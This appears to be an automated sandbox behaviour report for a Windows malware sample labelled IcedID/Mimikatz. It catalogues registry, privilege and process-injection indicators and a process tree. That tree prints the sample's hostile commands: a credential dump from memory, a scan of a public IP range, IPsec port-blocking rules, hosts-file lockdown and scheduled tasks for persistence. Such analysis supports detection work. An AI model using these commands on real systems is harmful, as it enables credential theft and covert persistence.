2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruznevtjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4636 cmd.exe 4556 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0009000000023bcf-5.dat nsis_installer_2 behavioral2/files/0x0020000000023c49-12.dat nsis_installer_1 behavioral2/files/0x0020000000023c49-12.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ byuzvnr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4556 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3124 schtasks.exe 3500 schtasks.exe 4220 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3016 byuzvnr.exe Token: SeDebugPrivilege 100 byuzvnr.exe Token: SeDebugPrivilege 1308 vfshost.exe Token: SeDebugPrivilege 2884 lllgdyunt.exe Token: SeLockMemoryPrivilege 2892 uieubf.exe Token: SeLockMemoryPrivilege 2892 uieubf.exe Token: SeDebugPrivilege 3992 lllgdyunt.exe Token: SeDebugPrivilege 2920 lllgdyunt.exe Token: SeDebugPrivilege 1652 lllgdyunt.exe Token: SeDebugPrivilege 1528 lllgdyunt.exe Token: SeDebugPrivilege 1532 lllgdyunt.exe Token: SeDebugPrivilege 3620 lllgdyunt.exe Token: SeDebugPrivilege 3704 lllgdyunt.exe Token: SeDebugPrivilege 4456 lllgdyunt.exe Token: SeDebugPrivilege 3524 lllgdyunt.exe Token: SeDebugPrivilege 1676 lllgdyunt.exe Token: SeDebugPrivilege 3576 lllgdyunt.exe Token: SeDebugPrivilege 348 lllgdyunt.exe Token: SeDebugPrivilege 3540 lllgdyunt.exe Token: SeDebugPrivilege 2212 lllgdyunt.exe Token: SeDebugPrivilege 4480 lllgdyunt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe 3016 byuzvnr.exe 3016 byuzvnr.exe 100 byuzvnr.exe 100 byuzvnr.exe 4740 xohudmc.exe 4844 meouau.exe 3936 byuzvnr.exe 3936 byuzvnr.exe 4648 byuzvnr.exe 4648 byuzvnr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4928 wrote to memory of 4636 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe 83 PID 4928 wrote to memory of 4636 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe 83 PID 4928 wrote to memory of 4636 4928 2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe 83 PID 4636 wrote to memory of 4556 4636 cmd.exe 85 PID 4636 wrote to memory of 4556 4636 cmd.exe 85 PID 4636 wrote to memory of 4556 4636 cmd.exe 85 PID 4636 wrote to memory of 3016 4636 cmd.exe 86 PID 4636 wrote to memory of 3016 4636 cmd.exe 86 PID 4636 wrote to memory of 3016 4636 cmd.exe 86 PID 100 wrote to memory of 3704 100 byuzvnr.exe 88 PID 100 wrote to memory of 3704 100 byuzvnr.exe 88 PID 100 wrote to memory of 3704 100 byuzvnr.exe 88 PID 3704 wrote to memory of 1468 3704 cmd.exe 90 PID 3704 wrote to memory of 1468 3704 cmd.exe 90 PID 3704 wrote to memory of 1468 3704 cmd.exe 90 PID 3704 wrote to memory of 2628 3704 cmd.exe 91 PID 3704 wrote to memory of 2628 3704 cmd.exe 91 PID 3704 wrote to memory of 2628 3704 cmd.exe 91 PID 3704 wrote to memory of 2280 3704 cmd.exe 92 PID 3704 wrote to memory of 2280 3704 cmd.exe 92 PID 3704 wrote to memory of 2280 3704 cmd.exe 92 PID 3704 wrote to memory of 4768 3704 cmd.exe 93 PID 3704 wrote to memory of 4768 3704 cmd.exe 93 PID 3704 wrote to memory of 4768 3704 cmd.exe 93 PID 3704 wrote to memory of 1576 3704 cmd.exe 94 PID 3704 wrote to memory of 1576 3704 cmd.exe 94 PID 3704 wrote to memory of 1576 3704 cmd.exe 94 PID 3704 wrote to memory of 4596 3704 cmd.exe 95 PID 3704 wrote to memory of 4596 3704 cmd.exe 95 PID 3704 wrote to memory of 4596 3704 cmd.exe 95 PID 100 wrote to memory of 1764 100 byuzvnr.exe 97 PID 100 wrote to memory of 1764 100 byuzvnr.exe 97 PID 100 wrote to memory of 1764 100 byuzvnr.exe 97 PID 100 wrote to memory of 644 100 byuzvnr.exe 99 PID 100 wrote to memory of 644 100 byuzvnr.exe 99 PID 100 wrote to memory of 644 100 byuzvnr.exe 99 PID 100 wrote to memory of 2056 100 byuzvnr.exe 101 PID 100 wrote to memory of 2056 100 byuzvnr.exe 101 PID 100 wrote to memory of 2056 100 byuzvnr.exe 101 PID 100 wrote to memory of 2920 100 byuzvnr.exe 115 PID 100 wrote to memory of 2920 100 byuzvnr.exe 115 PID 100 wrote to memory of 2920 100 byuzvnr.exe 115 PID 2920 wrote to memory of 388 2920 cmd.exe 117 PID 2920 wrote to memory of 388 2920 cmd.exe 117 PID 2920 wrote to memory of 388 2920 cmd.exe 117 PID 388 wrote to memory of 2576 388 wpcap.exe 118 PID 388 wrote to memory of 2576 388 wpcap.exe 118 PID 388 wrote to memory of 2576 388 wpcap.exe 118 PID 2576 wrote to memory of 4384 2576 net.exe 120 PID 2576 wrote to memory of 4384 2576 net.exe 120 PID 2576 wrote to memory of 4384 2576 net.exe 120 PID 388 wrote to memory of 4828 388 wpcap.exe 121 PID 388 wrote to memory of 4828 388 wpcap.exe 121 PID 388 wrote to memory of 4828 388 wpcap.exe 121 PID 4828 wrote to memory of 2308 4828 net.exe 123 PID 4828 wrote to memory of 2308 4828 net.exe 123 PID 4828 wrote to memory of 2308 4828 net.exe 123 PID 388 wrote to memory of 3992 388 wpcap.exe 124 PID 388 wrote to memory of 3992 388 wpcap.exe 124 PID 388 wrote to memory of 3992 388 wpcap.exe 124 PID 3992 wrote to memory of 2300 3992 net.exe 126 PID 3992 wrote to memory of 2300 3992 net.exe 126 PID 3992 wrote to memory of 2300 3992 net.exe 126 PID 388 wrote to memory of 2240 388 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\nqazjegtg\uieubf.exe"C:\Windows\TEMP\nqazjegtg\uieubf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\klhnlzly\byuzvnr.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4556
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3016
-
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2280
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1576
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4596
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1764
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exeC:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4384
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2308
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2300
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2240 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4928
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:5048 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3772 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2860 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3952
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:984 -
C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exeC:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\hgpuenbvt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5008 -
C:\Windows\hgpuenbvt\Corporate\vfshost.exeC:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"2⤵PID:740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"2⤵PID:228
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3500
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1980
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2356
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5028
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4296
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
